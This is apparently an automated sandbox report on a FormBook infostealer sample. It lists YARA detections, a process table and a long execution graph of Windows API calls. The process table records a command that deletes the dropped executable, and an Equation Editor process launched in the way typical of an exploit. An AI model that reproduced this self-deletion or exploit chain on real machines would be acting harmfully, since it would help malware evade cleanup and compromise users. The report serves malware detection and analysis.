                                        MD5 hash:00263CA2071DC9A6EE577EB356B0D1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate
                                        Has exited:false

                                        General

                                        Target ID:10
                                        Start time:13:26:03
                                        Start date:21/11/2023
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Users\user\AppData\Local\Temp\twbcaze.exe"
                                        Imagebase:0x4a4f0000
                                        File size:302'592 bytes
                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:12
                                        Start time:13:26:17
                                        Start date:21/11/2023
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543'304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:15.7%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:22.7%
                                          Total number of Nodes:1291
                                          Total number of Limit Nodes:23
                                          execution_graph 3656 404fc2 3657 404fe3 GetDlgItem GetDlgItem GetDlgItem 3656->3657 3658 40516e 3656->3658 3702 403e89 SendMessageA 3657->3702 3660 405177 GetDlgItem CreateThread CloseHandle 3658->3660 3661 40519f 3658->3661 3660->3661 3663 4051ca 3661->3663 3664 4051b6 ShowWindow ShowWindow 3661->3664 3665 4051ec 3661->3665 3662 405054 3668 40505b GetClientRect GetSystemMetrics SendMessageA SendMessageA 3662->3668 3666 405228 3663->3666 3670 405201 ShowWindow 3663->3670 3671 4051db 3663->3671 3704 403e89 SendMessageA 3664->3704 3667 403ebb 8 API calls 3665->3667 3666->3665 3677 405233 SendMessageA 3666->3677 3672 4051fa 3667->3672 3675 4050ca 3668->3675 3676 4050ae SendMessageA SendMessageA 3668->3676 3673 405221 3670->3673 3674 405213 3670->3674 3678 403e2d SendMessageA 3671->3678 3680 403e2d SendMessageA 3673->3680 3679 404e84 25 API calls 3674->3679 3681 4050dd 3675->3681 3682 4050cf SendMessageA 3675->3682 3676->3675 3677->3672 3683 40524c CreatePopupMenu 3677->3683 3678->3665 3679->3673 3680->3666 3685 403e54 19 API calls 3681->3685 3682->3681 3684 405bba 18 API calls 3683->3684 3686 40525c AppendMenuA 3684->3686 3687 4050ed 3685->3687 3688 405282 3686->3688 3689 40526f GetWindowRect 3686->3689 3690 4050f6 ShowWindow 3687->3690 3691 40512a GetDlgItem SendMessageA 3687->3691 3692 40528b TrackPopupMenu 3688->3692 3689->3692 3693 405119 3690->3693 3694 40510c ShowWindow 3690->3694 3691->3672 3695 405151 SendMessageA SendMessageA 3691->3695 3692->3672 3696 4052a9 3692->3696 3703 403e89 SendMessageA 3693->3703 3694->3693 3695->3672 3697 4052c5 SendMessageA 3696->3697 3697->3697 3699 4052e2 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3697->3699 3700 405304 SendMessageA 3699->3700 3700->3700 3701 405325 GlobalUnlock SetClipboardData CloseClipboard 3700->3701 3701->3672 3702->3662 3703->3691 3704->3663 3705 401cc2 3709 402a0c 3705->3709 3707 401cd2 SetWindowLongA 3708 4028be 3707->3708 3710 405bba 18 API calls 3709->3710 3711 402a20 3710->3711 3711->3707 3712 401a43 3713 402a0c 18 API calls 3712->3713 3714 401a49 3713->3714 3715 402a0c 18 API calls 3714->3715 3716 4019f3 3715->3716 3724 402648 3725 40264b 3724->3725 3728 402663 3724->3728 3726 402658 FindNextFileA 3725->3726 3727 4026a2 3726->3727 3726->3728 3730 405b98 lstrcpynA 3727->3730 3730->3728 3734 401bca 3735 402a0c 18 API calls 3734->3735 3736 401bd1 3735->3736 3737 402a0c 18 API calls 3736->3737 3738 401bdb 3737->3738 3739 401beb 3738->3739 3740 402a29 18 API calls 3738->3740 3741 401bfb 3739->3741 3742 402a29 18 API calls 3739->3742 3740->3739 3743 401c06 3741->3743 3744 401c4a 3741->3744 3742->3741 3745 402a0c 18 API calls 3743->3745 3746 402a29 18 API calls 3744->3746 3747 401c0b 3745->3747 3748 401c4f 3746->3748 3749 402a0c 18 API calls 3747->3749 3750 402a29 18 API calls 3748->3750 3751 401c14 3749->3751 3752 401c58 FindWindowExA 3750->3752 3753 401c3a SendMessageA 3751->3753 3754 401c1c SendMessageTimeoutA 3751->3754 3755 401c76 3752->3755 3753->3755 3754->3755 3756 40424b 3757 404281 3756->3757 3758 40425b 3756->3758 3760 403ebb 8 API calls 3757->3760 3759 403e54 19 API calls 3758->3759 3761 404268 SetDlgItemTextA 3759->3761 3762 40428d 3760->3762 3761->3757 3763 4024cf 3764 402a29 18 API calls 3763->3764 3765 4024d6 3764->3765 3768 40586f GetFileAttributesA CreateFileA 3765->3768 3767 4024e2 3768->3767 2984 401751 3022 402a29 2984->3022 2986 401758 2987 401776 2986->2987 2988 40177e 2986->2988 3071 405b98 lstrcpynA 2987->3071 3072 405b98 lstrcpynA 2988->3072 2991 40177c 3028 405dfa 2991->3028 2992 401789 3073 40568b lstrlenA CharPrevA 2992->3073 2999 4017b2 CompareFileTime 3017 40179b 2999->3017 3000 401876 3038 404e84 3000->3038 3001 40184d 3003 404e84 25 API calls 3001->3003 3011 401862 3001->3011 3003->3011 3007 4018a7 SetFileTime 3008 4018b9 CloseHandle 3007->3008 3010 4018ca 3008->3010 3008->3011 3012 4018e2 3010->3012 3013 4018cf 3010->3013 3016 405bba 18 API calls 3012->3016 3015 405bba 18 API calls 3013->3015 3014 405b98 lstrcpynA 3014->3017 3018 4018d7 lstrcatA 3015->3018 3019 4018ea 3016->3019 3017->2999 3017->3000 3017->3001 3017->3014 3037 40586f GetFileAttributesA CreateFileA 3017->3037 3076 405e93 FindFirstFileA 3017->3076 3079 405850 GetFileAttributesA 3017->3079 3082 405bba 3017->3082 3101 405459 3017->3101 3018->3019 3021 405459 MessageBoxIndirectA 3019->3021 3021->3011 3023 402a35 3022->3023 3024 405bba 18 API calls 3023->3024 3025 402a56 3024->3025 3026 402a62 3025->3026 3027 405dfa 5 API calls 3025->3027 3026->2986 3027->3026 3035 405e06 3028->3035 3029 405e6e 3030 405e72 CharPrevA 3029->3030 3033 405e8d 3029->3033 3030->3029 3031 405e63 CharNextA 3031->3029 3031->3035 3033->3017 3034 405e51 CharNextA 3034->3035 3035->3029 3035->3031 3035->3034 3036 405e5e CharNextA 3035->3036 3105 4056b6 3035->3105 3036->3031 3037->3017 3039 404e9f 3038->3039 3047 401880 3038->3047 3040 404ebc lstrlenA 3039->3040 3041 405bba 18 API calls 3039->3041 3042 404ee5 3040->3042 3043 404eca lstrlenA 3040->3043 3041->3040 3045 404ef8 3042->3045 3046 404eeb SetWindowTextA 3042->3046 3044 404edc lstrcatA 3043->3044 3043->3047 3044->3042 3045->3047 3048 404efe SendMessageA SendMessageA SendMessageA 3045->3048 3046->3045 3049 402e8e 3047->3049 3048->3047 3050 402ea4 3049->3050 3051 402ecf 3050->3051 3118 4030b3 SetFilePointer 3050->3118 3109 403081 ReadFile 3051->3109 3055 403015 3057 403019 3055->3057 3058 403031 3055->3058 3056 402eec GetTickCount 3059 402eff 3056->3059 3060 403081 ReadFile 3057->3060 3061 403081 ReadFile 3058->3061 3062 401893 3058->3062 3064 40304c WriteFile 3058->3064 3059->3062 3063 403081 ReadFile 3059->3063 3067 402f65 GetTickCount 3059->3067 3068 402f8e MulDiv wsprintfA 3059->3068 3070 402fcc WriteFile 3059->3070 3111 406025 3059->3111 3060->3062 3061->3058 3062->3007 3062->3008 3063->3059 3064->3062 3065 403061 3064->3065 3065->3058 3065->3062 3067->3059 3069 404e84 25 API calls 3068->3069 3069->3059 3070->3059 3070->3062 3071->2991 3072->2992 3074 40178f lstrcatA 3073->3074 3075 4056a5 lstrcatA 3073->3075 3074->2991 3075->3074 3077 405eb4 3076->3077 3078 405ea9 FindClose 3076->3078 3077->3017 3078->3077 3080 40586c 3079->3080 3081 40585f SetFileAttributesA 3079->3081 3080->3017 3081->3080 3087 405bc7 3082->3087 3083 405de1 3084 405df6 3083->3084 3126 405b98 lstrcpynA 3083->3126 3084->3017 3086 405c5f GetVersion 3094 405c6c 3086->3094 3087->3083 3087->3086 3088 405db8 lstrlenA 3087->3088 3090 405bba 10 API calls 3087->3090 3096 405dfa 5 API calls 3087->3096 3124 405af6 wsprintfA 3087->3124 3125 405b98 lstrcpynA 3087->3125 3088->3087 3090->3088 3093 405cd7 GetSystemDirectoryA 3093->3094 3094->3087 3094->3093 3095 405cea GetWindowsDirectoryA 3094->3095 3097 405bba 10 API calls 3094->3097 3098 405d61 lstrcatA 3094->3098 3099 405d1e SHGetSpecialFolderLocation 3094->3099 3119 405a7f RegOpenKeyExA 3094->3119 3095->3094 3096->3087 3097->3094 3098->3087 3099->3094 3100 405d36 SHGetPathFromIDListA CoTaskMemFree 3099->3100 3100->3094 3102 40546e 3101->3102 3103 4054ba 3102->3103 3104 405482 MessageBoxIndirectA 3102->3104 3103->3017 3104->3103 3106 4056bc 3105->3106 3107 4056cf 3106->3107 3108 4056c2 CharNextA 3106->3108 3107->3035 3108->3106 3110 402eda 3109->3110 3110->3055 3110->3056 3110->3062 3112 40604a 3111->3112 3113 406052 3111->3113 3112->3059 3113->3112 3114 4060e2 GlobalAlloc 3113->3114 3115 4060d9 GlobalFree 3113->3115 3116 406150 GlobalFree 3113->3116 3117 406159 GlobalAlloc 3113->3117 3114->3112 3114->3113 3115->3114 3116->3117 3117->3112 3117->3113 3118->3051 3120 405af0 3119->3120 3121 405ab2 RegQueryValueExA 3119->3121 3120->3094 3122 405ad3 RegCloseKey 3121->3122 3122->3120 3124->3087 3125->3087 3126->3084 3769 401651 3770 402a29 18 API calls 3769->3770 3771 401657 3770->3771 3772 405e93 2 API calls 3771->3772 3773 40165d 3772->3773 3774 401951 3775 402a0c 18 API calls 3774->3775 3776 401958 3775->3776 3777 402a0c 18 API calls 3776->3777 3778 401962 3777->3778 3779 402a29 18 API calls 3778->3779 3780 40196b 3779->3780 3781 40197e lstrlenA 3780->3781 3782 4019b9 3780->3782 3783 401988 3781->3783 3783->3782 3787 405b98 lstrcpynA 3783->3787 3785 4019a2 3785->3782 3786 4019af lstrlenA 3785->3786 3786->3782 3787->3785 3788 4019d2 3789 402a29 18 API calls 3788->3789 3790 4019d9 3789->3790 3791 402a29 18 API calls 3790->3791 3792 4019e2 3791->3792 3793 4019e9 lstrcmpiA 3792->3793 3794 4019fb lstrcmpA 3792->3794 3795 4019ef 3793->3795 3794->3795 3796 402053 3797 402a29 18 API calls 3796->3797 3798 40205a 3797->3798 3799 402a29 18 API calls 3798->3799 3800 402064 3799->3800 3801 402a29 18 API calls 3800->3801 3802 40206d 3801->3802 3803 402a29 18 API calls 3802->3803 3804 402077 3803->3804 3805 402a29 18 API calls 3804->3805 3807 402081 3805->3807 3806 402095 CoCreateInstance 3809 40216a 3806->3809 3812 4020b4 3806->3812 3807->3806 3808 402a29 18 API calls 3807->3808 3808->3806 3810 401423 25 API calls 3809->3810 3811 40219c 3809->3811 3810->3811 3812->3809 3813 402149 MultiByteToWideChar 3812->3813 3813->3809 3814 4047d3 GetDlgItem GetDlgItem 3815 404827 7 API calls 3814->3815 3823 404a44 3814->3823 3816 4048c0 SendMessageA 3815->3816 3817 4048cd DeleteObject 3815->3817 3816->3817 3818 4048d8 3817->3818 3820 40490f 3818->3820 3822 405bba 18 API calls 3818->3822 3819 404b2e 3821 404bdd 3819->3821 3825 404a37 3819->3825 3830 404b87 SendMessageA 3819->3830 3824 403e54 19 API calls 3820->3824 3826 404bf2 3821->3826 3827 404be6 SendMessageA 3821->3827 3828 4048f1 SendMessageA SendMessageA 3822->3828 3823->3819 3846 404ab8 3823->3846 3867 404753 SendMessageA 3823->3867 3829 404923 3824->3829 3831 403ebb 8 API calls 3825->3831 3838 404c04 ImageList_Destroy 3826->3838 3839 404c0b 3826->3839 3843 404c1b 3826->3843 3827->3826 3828->3818 3834 403e54 19 API calls 3829->3834 3830->3825 3836 404b9c SendMessageA 3830->3836 3837 404dcd 3831->3837 3832 404b20 SendMessageA 3832->3819 3847 404931 3834->3847 3835 404d81 3835->3825 3844 404d93 ShowWindow GetDlgItem ShowWindow 3835->3844 3841 404baf 3836->3841 3838->3839 3842 404c14 GlobalFree 3839->3842 3839->3843 3840 404a05 GetWindowLongA SetWindowLongA 3845 404a1e 3840->3845 3853 404bc0 SendMessageA 3841->3853 3842->3843 3843->3835 3852 40140b 2 API calls 3843->3852 3861 404c4d 3843->3861 3844->3825 3848 404a24 ShowWindow 3845->3848 3849 404a3c 3845->3849 3846->3819 3846->3832 3847->3840 3851 404980 SendMessageA 3847->3851 3854 4049ff 3847->3854 3856 4049bc SendMessageA 3847->3856 3857 4049cd SendMessageA 3847->3857 3865 403e89 SendMessageA 3848->3865 3866 403e89 SendMessageA 3849->3866 3851->3847 3852->3861 3853->3821 3854->3840 3854->3845 3856->3847 3857->3847 3858 404d57 InvalidateRect 3858->3835 3859 404d6d 3858->3859 3872 40470e 3859->3872 3860 404c7b SendMessageA 3864 404c91 3860->3864 3861->3860 3861->3864 3863 404d05 SendMessageA SendMessageA 3863->3864 3864->3858 3864->3863 3865->3825 3866->3823 3868 4047b2 SendMessageA 3867->3868 3869 404776 GetMessagePos ScreenToClient SendMessageA 3867->3869 3870 4047aa 3868->3870 3869->3870 3871 4047af 3869->3871 3870->3846 3871->3868 3875 404649 3872->3875 3874 404723 3874->3835 3876 40465f 3875->3876 3877 405bba 18 API calls 3876->3877 3878 4046c3 3877->3878 3879 405bba 18 API calls 3878->3879 3880 4046ce 3879->3880 3881 405bba 18 API calls 3880->3881 3882 4046e4 lstrlenA wsprintfA SetDlgItemTextA 3881->3882 3882->3874 3883 404dd4 3884 404de2 3883->3884 3885 404df9 3883->3885 3886 404de8 3884->3886 3901 404e62 3884->3901 3887 404e07 IsWindowVisible 3885->3887 3890 404e1e 3885->3890 3891 403ea0 SendMessageA 3886->3891 3889 404e14 3887->3889 3887->3901 3888 404e68 CallWindowProcA 3892 404df2 3888->3892 3893 404753 5 API calls 3889->3893 3890->3888 3902 405b98 lstrcpynA 3890->3902 3891->3892 3893->3890 3895 404e4d 3903 405af6 wsprintfA 3895->3903 3897 404e54 3898 40140b 2 API calls 3897->3898 3899 404e5b 3898->3899 3904 405b98 lstrcpynA 3899->3904 3901->3888 3902->3895 3903->3897 3904->3901 3905 4061d4 3911 406058 3905->3911 3906 4069c3 3907 4060e2 GlobalAlloc 3907->3906 3907->3911 3908 4060d9 GlobalFree 3908->3907 3909 406150 GlobalFree 3910 406159 GlobalAlloc 3909->3910 3910->3906 3910->3911 3911->3906 3911->3907 3911->3908 3911->3909 3911->3910 3912 402256 3913 40225e 3912->3913 3918 402264 3912->3918 3914 402a29 18 API calls 3913->3914 3914->3918 3915 402a29 18 API calls 3917 402274 3915->3917 3916 402282 3920 402a29 18 API calls 3916->3920 3917->3916 3919 402a29 18 API calls 3917->3919 3918->3915 3918->3917 3919->3916 3921 40228b WritePrivateProfileStringA 3920->3921 3922 4014d6 3923 402a0c 18 API calls 3922->3923 3924 4014dc Sleep 3923->3924 3926 4028be 3924->3926 3927 40245a 3937 402b33 3927->3937 3929 402464 3930 402a0c 18 API calls 3929->3930 3931 40246d 3930->3931 3932 402490 RegEnumValueA 3931->3932 3933 402484 RegEnumKeyA 3931->3933 3935 40268f 3931->3935 3934 4024a9 RegCloseKey 3932->3934 3932->3935 3933->3934 3934->3935 3938 402a29 18 API calls 3937->3938 3939 402b4c 3938->3939 3940 402b5a RegOpenKeyExA 3939->3940 3940->3929 3941 4022da 3942 40230a 3941->3942 3943 4022df 3941->3943 3945 402a29 18 API calls 3942->3945 3944 402b33 19 API calls 3943->3944 3946 4022e6 3944->3946 3947 402311 3945->3947 3948 402a29 18 API calls 3946->3948 3951 402327 3946->3951 3952 402a69 RegOpenKeyExA 3947->3952 3950 4022f7 RegDeleteValueA RegCloseKey 3948->3950 3950->3951 3957 402a94 3952->3957 3961 402ae0 3952->3961 3953 402aba RegEnumKeyA 3954 402acc RegCloseKey 3953->3954 3953->3957 3955 405f28 5 API calls 3954->3955 3958 402adc 3955->3958 3956 402af1 RegCloseKey 3956->3961 3957->3953 3957->3954 3957->3956 3959 402a69 5 API calls 3957->3959 3960 402b0c RegDeleteKeyA 3958->3960 3958->3961 3959->3957 3960->3961 3961->3951 3962 40155b 3963 401565 3962->3963 3964 401577 ShowWindow 3963->3964 3965 40157e 3963->3965 3964->3965 3966 40158c ShowWindow 3965->3966 3967 4028be 3965->3967 3966->3967 3975 401cde GetDlgItem GetClientRect 3976 402a29 18 API calls 3975->3976 3977 401d0e LoadImageA SendMessageA 3976->3977 3978 401d2c DeleteObject 3977->3978 3979 4028be 3977->3979 3978->3979 3980 401dde 3981 402a29 18 API calls 3980->3981 3982 401de4 3981->3982 3983 402a29 18 API calls 3982->3983 3984 401ded 3983->3984 3985 402a29 18 API calls 3984->3985 3986 401df6 3985->3986 3987 402a29 18 API calls 3986->3987 3988 401dff 3987->3988 3989 401423 25 API calls 3988->3989 3990 401e06 ShellExecuteA 3989->3990 3991 401e33 3990->3991 3992 401662 3993 402a29 18 API calls 3992->3993 3994 401669 3993->3994 3995 402a29 18 API calls 3994->3995 3996 401672 3995->3996 3997 402a29 18 API calls 3996->3997 3998 40167b MoveFileA 3997->3998 3999 40168e 3998->3999 4005 401687 3998->4005 4001 405e93 2 API calls 3999->4001 4003 40219c 3999->4003 4000 401423 25 API calls 4000->4003 4002 40169d 4001->4002 4002->4003 4004 4058e6 40 API calls 4002->4004 4004->4005 4005->4000 4006 401ee2 4007 402a29 18 API calls 4006->4007 4008 401ee9 4007->4008 4009 405f28 5 API calls 4008->4009 4010 401ef8 4009->4010 4011 401f10 GlobalAlloc 4010->4011 4016 401f78 4010->4016 4012 401f24 4011->4012 4011->4016 4013 405f28 5 API calls 4012->4013 4014 401f2b 4013->4014 4015 405f28 5 API calls 4014->4015 4017 401f35 4015->4017 4017->4016 4021 405af6 wsprintfA 4017->4021 4019 401f6c 4022 405af6 wsprintfA 4019->4022 4021->4019 4022->4016 4023 4023e2 4024 402b33 19 API calls 4023->4024 4025 4023ec 4024->4025 4026 402a29 18 API calls 4025->4026 4027 4023f5 4026->4027 4028 4023ff RegQueryValueExA 4027->4028 4033 40268f 4027->4033 4029 40241f 4028->4029 4030 402425 RegCloseKey 4028->4030 4029->4030 4034 405af6 wsprintfA 4029->4034 4030->4033 4034->4030 4035 4045e3 4036 4045f3 4035->4036 4037 40460f 4035->4037 4046 40543d GetDlgItemTextA 4036->4046 4039 404642 4037->4039 4040 404615 SHGetPathFromIDListA 4037->4040 4042 40462c SendMessageA 4040->4042 4043 404625 4040->4043 4041 404600 SendMessageA 4041->4037 4042->4039 4044 40140b 2 API calls 4043->4044 4044->4042 4046->4041 4047 403f68 lstrcpynA lstrlenA 4048 402b6e 4049 402b7d SetTimer 4048->4049 4051 402b96 4048->4051 4049->4051 4050 402beb 4051->4050 4052 402bb0 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4051->4052 4052->4050 4053 4014f0 SetForegroundWindow 4054 4028be 4053->4054 4055 402671 4056 402a29 18 API calls 4055->4056 4057 402678 FindFirstFileA 4056->4057 4058 40269b 4057->4058 4059 40268b 4057->4059 4060 4026a2 4058->4060 4063 405af6 wsprintfA 4058->4063 4064 405b98 lstrcpynA 4060->4064 4063->4060 4064->4059 4065 4024f1 4066 4024f6 4065->4066 4067 402507 4065->4067 4069 402a0c 18 API calls 4066->4069 4068 402a29 18 API calls 4067->4068 4070 40250e lstrlenA 4068->4070 4071 4024fd 4069->4071 4070->4071 4072 40252d WriteFile 4071->4072 4073 40268f 4071->4073 4072->4073 4086 4018f5 4087 40192c 4086->4087 4088 402a29 18 API calls 4087->4088 4089 401931 4088->4089 4090 4054bd 70 API calls 4089->4090 4091 40193a 4090->4091 4092 4018f8 4093 402a29 18 API calls 4092->4093 4094 4018ff 4093->4094 4095 405459 MessageBoxIndirectA 4094->4095 4096 401908 4095->4096 3420 4030fb SetErrorMode GetVersion 3421 403133 3420->3421 3422 403139 3420->3422 3423 405f28 5 API calls 3421->3423 3424 405eba 3 API calls 3422->3424 3423->3422 3425 40314f lstrlenA 3424->3425 3425->3422 3426 40315e 3425->3426 3427 405f28 5 API calls 3426->3427 3428 403165 3427->3428 3429 405f28 5 API calls 3428->3429 3430 40316c #17 OleInitialize SHGetFileInfoA 3429->3430 3510 405b98 lstrcpynA 3430->3510 3432 4031a9 GetCommandLineA 3511 405b98 lstrcpynA 3432->3511 3434 4031bb GetModuleHandleA 3435 4031d2 3434->3435 3436 4056b6 CharNextA 3435->3436 3437 4031e6 CharNextA 3436->3437 3443 4031f3 3437->3443 3438 403260 3439 403273 GetTempPathA 3438->3439 3512 4030ca 3439->3512 3441 403289 3444 4032b1 DeleteFileA 3441->3444 3445 40328d GetWindowsDirectoryA lstrcatA 3441->3445 3442 4056b6 CharNextA 3442->3443 3443->3438 3443->3442 3449 403262 3443->3449 3522 402c55 GetTickCount GetModuleFileNameA 3444->3522 3447 4030ca 12 API calls 3445->3447 3448 4032a9 3447->3448 3448->3444 3451 403332 ExitProcess OleUninitialize 3448->3451 3606 405b98 lstrcpynA 3449->3606 3450 4032c5 3450->3451 3453 40331e 3450->3453 3457 4056b6 CharNextA 3450->3457 3454 403456 3451->3454 3455 403347 3451->3455 3550 4035eb 3453->3550 3459 4034f9 ExitProcess 3454->3459 3464 405f28 5 API calls 3454->3464 3458 405459 MessageBoxIndirectA 3455->3458 3461 4032dc 3457->3461 3463 403355 ExitProcess 3458->3463 3460 40332e 3460->3451 3468 4032f9 3461->3468 3469 40335d 3461->3469 3465 403469 3464->3465 3466 405f28 5 API calls 3465->3466 3467 403472 3466->3467 3470 405f28 5 API calls 3467->3470 3472 40576c 18 API calls 3468->3472 3471 4053e0 5 API calls 3469->3471 3473 40347b 3470->3473 3474 403362 lstrcatA 3471->3474 3475 403304 3472->3475 3476 403499 3473->3476 3485 403489 GetCurrentProcess 3473->3485 3477 403373 lstrcatA 3474->3477 3478 40337e lstrcatA lstrcmpiA 3474->3478 3475->3451 3607 405b98 lstrcpynA 3475->3607 3481 405f28 5 API calls 3476->3481 3477->3478 3478->3451 3479 40339a 3478->3479 3482 4033a6 3479->3482 3483 40339f 3479->3483 3486 4034d0 3481->3486 3490 4053c3 2 API calls 3482->3490 3488 405346 4 API calls 3483->3488 3484 403313 3608 405b98 lstrcpynA 3484->3608 3485->3476 3487 4034e5 ExitWindowsEx 3486->3487 3492 4034f2 3486->3492 3487->3459 3487->3492 3491 4033a4 3488->3491 3493 4033ab SetCurrentDirectoryA 3490->3493 3491->3493 3494 40140b 2 API calls 3492->3494 3495 4033c5 3493->3495 3496 4033ba 3493->3496 3494->3459 3610 405b98 lstrcpynA 3495->3610 3609 405b98 lstrcpynA 3496->3609 3499 4033d3 3500 405bba 18 API calls 3499->3500 3503 40344a 3499->3503 3504 4058e6 40 API calls 3499->3504 3507 405bba 18 API calls 3499->3507 3508 4053f8 2 API calls 3499->3508 3509 403436 CloseHandle 3499->3509 3501 4033f5 DeleteFileA 3500->3501 3501->3499 3502 403402 CopyFileA 3501->3502 3502->3499 3505 4058e6 40 API calls 3503->3505 3504->3499 3506 403451 3505->3506 3506->3451 3507->3499 3508->3499 3509->3499 3510->3432 3511->3434 3513 405dfa 5 API calls 3512->3513 3515 4030d6 3513->3515 3514 4030e0 3514->3441 3515->3514 3516 40568b 3 API calls 3515->3516 3517 4030e8 3516->3517 3518 4053c3 2 API calls 3517->3518 3519 4030ee 3518->3519 3611 40589e 3519->3611 3615 40586f GetFileAttributesA CreateFileA 3522->3615 3524 402c95 3544 402ca5 3524->3544 3616 405b98 lstrcpynA 3524->3616 3526 402cbb 3527 4056d2 2 API calls 3526->3527 3528 402cc1 3527->3528 3617 405b98 lstrcpynA 3528->3617 3530 402ccc GetFileSize 3531 402ce3 3530->3531 3547 402dc8 3530->3547 3534 403081 ReadFile 3531->3534 3537 402e34 3531->3537 3531->3544 3546 402bf1 6 API calls 3531->3546 3531->3547 3533 402dd1 3535 402e01 GlobalAlloc 3533->3535 3533->3544 3629 4030b3 SetFilePointer 3533->3629 3534->3531 3630 4030b3 SetFilePointer 3535->3630 3541 402bf1 6 API calls 3537->3541 3539 402dea 3542 403081 ReadFile 3539->3542 3540 402e1c 3543 402e8e 37 API calls 3540->3543 3541->3544 3545 402df5 3542->3545 3548 402e28 3543->3548 3544->3450 3545->3535 3545->3544 3546->3531 3618 402bf1 3547->3618 3548->3544 3549 402e65 SetFilePointer 3548->3549 3549->3544 3551 405f28 5 API calls 3550->3551 3552 4035ff 3551->3552 3553 403617 3552->3553 3555 403605 3552->3555 3554 405a7f 3 API calls 3553->3554 3556 403638 3554->3556 3640 405af6 wsprintfA 3555->3640 3558 403656 lstrcatA 3556->3558 3560 405a7f 3 API calls 3556->3560 3559 403615 3558->3559 3631 4038b4 3559->3631 3560->3558 3563 40576c 18 API calls 3564 403688 3563->3564 3565 403711 3564->3565 3567 405a7f 3 API calls 3564->3567 3566 40576c 18 API calls 3565->3566 3568 403717 3566->3568 3569 4036b4 3567->3569 3570 403727 LoadImageA 3568->3570 3571 405bba 18 API calls 3568->3571 3569->3565 3574 4036d0 lstrlenA 3569->3574 3578 4056b6 CharNextA 3569->3578 3572 403752 RegisterClassA 3570->3572 3573 4037db 3570->3573 3571->3570 3575 4037e5 3572->3575 3576 40378e SystemParametersInfoA CreateWindowExA 3572->3576 3577 40140b 2 API calls 3573->3577 3579 403704 3574->3579 3580 4036de lstrcmpiA 3574->3580 3575->3460 3576->3573 3581 4037e1 3577->3581 3583 4036ce 3578->3583 3582 40568b 3 API calls 3579->3582 3580->3579 3584 4036ee GetFileAttributesA 3580->3584 3581->3575 3585 4038b4 19 API calls 3581->3585 3586 40370a 3582->3586 3583->3574 3587 4036fa 3584->3587 3588 4037f2 3585->3588 3641 405b98 lstrcpynA 3586->3641 3587->3579 3590 4056d2 2 API calls 3587->3590 3591 403881 3588->3591 3592 4037fe ShowWindow 3588->3592 3590->3579 3642 404f56 OleInitialize 3591->3642 3594 405eba 3 API calls 3592->3594 3596 403816 3594->3596 3595 403887 3597 4038a3 3595->3597 3598 40388b 3595->3598 3599 403824 GetClassInfoA 3596->3599 3601 405eba 3 API calls 3596->3601 3600 40140b 2 API calls 3597->3600 3598->3575 3604 40140b 2 API calls 3598->3604 3602 403838 GetClassInfoA RegisterClassA 3599->3602 3603 40384e DialogBoxParamA 3599->3603 